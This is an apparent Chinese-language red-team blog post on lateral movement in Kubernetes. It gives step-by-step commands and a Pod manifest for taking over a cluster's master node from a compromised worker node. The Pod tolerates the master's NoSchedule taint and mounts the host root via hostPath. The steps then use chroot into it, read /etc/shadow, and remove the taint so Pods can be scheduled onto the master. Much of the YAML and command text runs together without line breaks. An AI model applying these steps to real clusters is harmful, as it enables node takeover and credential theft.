文章前言
污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的Pod,例如:kube-system
基本原理
攻击者在获取到node节点的权限后可以通过kubectl来创建一个能够容忍主节点的污点的Pod,当该Pod被成功创建到Master上之后,攻击者可以通过在子节点上操作该Pod实现对主节点的控制
横向移动
Step 1:Node中查看节点信息
kubectl get nodesStep 2:确认Master节点的容忍度
#方式一kubectl describe nodes master
#方式二kubectl describe node master | grep 'Taints' -A 5
Step 3:创建带有容忍参数的Pod(必要时可以修改Yaml使Pod增加到特定的Node上去)
apiVersion: v1kind: Podmetadata:name: control-master-15spec:tolerations:key: node-role.kubernetes.io/masteroperator: Existseffect: NoSchedulecontainers:name: control-master-15image: ubuntu:18.04command: ["/bin/sleep", "3650d"]volumeMounts:name: mastermountPath: /mastervolumes:name: masterhostPath:path: /type: Directory
#创建Podkubectl create -f control-master.yaml#部署情况kubectl get deploy -o wide#Pod详情kubectl get pod -o wide
Step 4:获得Master控制端
kubectl exec control-master-15 -it bashchroot /master bashls -alcat /etc/shadow
扩展技巧
执行以下命令清除污点之后直接执行部署Pod到Master上,之后通过挂载实现逃逸获取Master节点的权限
#清除污点kubectl taint nodes debian node-role.kubernetes.io/master:NoSchedule-#查看污点kubectl describe node master | grep 'Taints' -A 5
推 荐 阅 读
横向移动之RDP&Desktop Session Hija
